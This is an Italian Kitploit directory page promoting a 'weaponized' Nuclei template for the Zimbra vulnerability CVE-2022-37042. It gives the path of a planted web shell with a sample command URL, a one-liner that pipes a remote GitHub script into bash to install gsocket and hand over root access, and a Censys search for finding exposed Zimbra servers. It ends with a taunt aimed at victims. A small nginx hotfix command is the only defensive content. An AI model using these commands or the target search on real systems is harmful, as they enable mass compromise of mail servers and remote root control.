Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-37042 — Template weaponizzato Nuclei per Zimbra CVE-2022-37042 | Kitploit
Strumenti/GitHubGitHub/aels/cve-2022-37042
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubaels/cve-2022-37042

CVE-2022-37042

Template weaponizzato Nuclei per Zimbra CVE-2022-37042

Vedi Repository
18113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-37042

immagine

Template Nuclei weaponizzato per Zimbra CVE-2022-37042

percorso della shell: /public/formatter.jsp

Nuclei stesso: https://github.com/projectdiscovery/nuclei

La shell ha un input nascosto con opacità 0, quindi basta passare il mouse sopra, digitare il comando e premere il tasto [Invio]:

immagine

URL di esempio della shell:

root@kitploit:~
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id

Hotfix CVE-2022-37042 per patchare i server compromessi

esegui questo comando (solo una volta):

root@kitploit:~
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;

serve codice aggiuntivo per i server che non usano Nginx ma Apache. Le pull request sono benvenute.

Zimbra autoroot tramite zimbslap

root@kitploit:~
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1

questo comando installerà global-socket (https://www.gsocket.io/deploy/) e ti passerà la chiave per connetterti come root.

Ottieni gli IP di Zimbra

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22

buon compleanno massacro, figli di puttana ;)

Scarica lo strumento